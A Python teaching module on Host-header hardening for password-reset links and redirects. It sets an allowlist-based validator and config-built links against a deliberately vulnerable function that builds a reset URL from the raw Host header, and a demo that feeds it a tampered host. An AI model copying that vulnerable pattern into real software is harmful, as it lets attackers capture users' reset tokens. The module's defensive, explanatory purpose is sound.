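```python
"""Host-header hardening for reset links and redirects (added example)."""
from typing import Dict

# Hosts this application legitimately serves (constructed values).
ALLOWED_HOSTS = {"realweb.example", "www.realweb.example"}
# Host used when building links that leave the app (e-mails, redirects).
CANONICAL_HOST = "www.realweb.example"


class BadHost(ValueError):
    """Request arrived for a host this application does not serve."""


def effective_host(headers: Dict[str, str], trust_forwarded: bool = False) -> str:
    """Validate the request host against the allowlist and return it.

    X-Forwarded-Host is honoured only when trust_forwarded is True, i.e. the
    app sits behind a proxy that always overwrites that header. Otherwise it
    is ignored, so points 2 and 3 of the notes (swapping Host and
    X-Forwarded-Host) change nothing.
    """
    host = headers.get("host", "")
    if trust_forwarded and "x-forwarded-host" in headers:
        host = headers["x-forwarded-host"].split(",")[0]
    host = host.strip().lower().split(":")[0]   # drop any port (IPv6 literals not handled)
    if host not in ALLOWED_HOSTS:
        raise BadHost(f"unexpected Host value: {host!r}")
    return host


def host_allowed(headers: Dict[str, str], trust_forwarded: bool = False) -> bool:
    """True if the request would pass effective_host(); handy for middleware."""
    try:
        effective_host(headers, trust_forwarded)
        return True
    except BadHost:
        return False


def vulnerable_reset_url(token: str, headers: Dict[str, str]) -> str:
    """The pattern point 5 describes: link built from whatever Host arrived."""
    return f"https://{headers.get('host', '')}/reset?token={token}"


def hardened_reset_url(token: str, headers: Dict[str, str]) -> str:
    """Reset link built from configuration, never from the request."""
    effective_host(headers)   # reject the request outright if the host is foreign
    return f"https://{CANONICAL_HOST}/reset?token={token}"


def redirect_target(path: str, headers: Dict[str, str]) -> str:
    """Absolute URL for a redirect or a cached link (points 1 and 4): same fix,
    the host comes from the validated value, not the raw header."""
    return f"https://{effective_host(headers)}{path}"


if __name__ == "__main__":
    tampered = {"host": "bing.com"}   # the Host value the notes substitute
    print("vulnerable:", vulnerable_reset_url("TOKEN_PLACEHOLDER", tampered))
    try:
        hardened_reset_url("TOKEN_PLACEHOLDER", tampered)
    except BadHost as err:
        print("hardened  :", err)
```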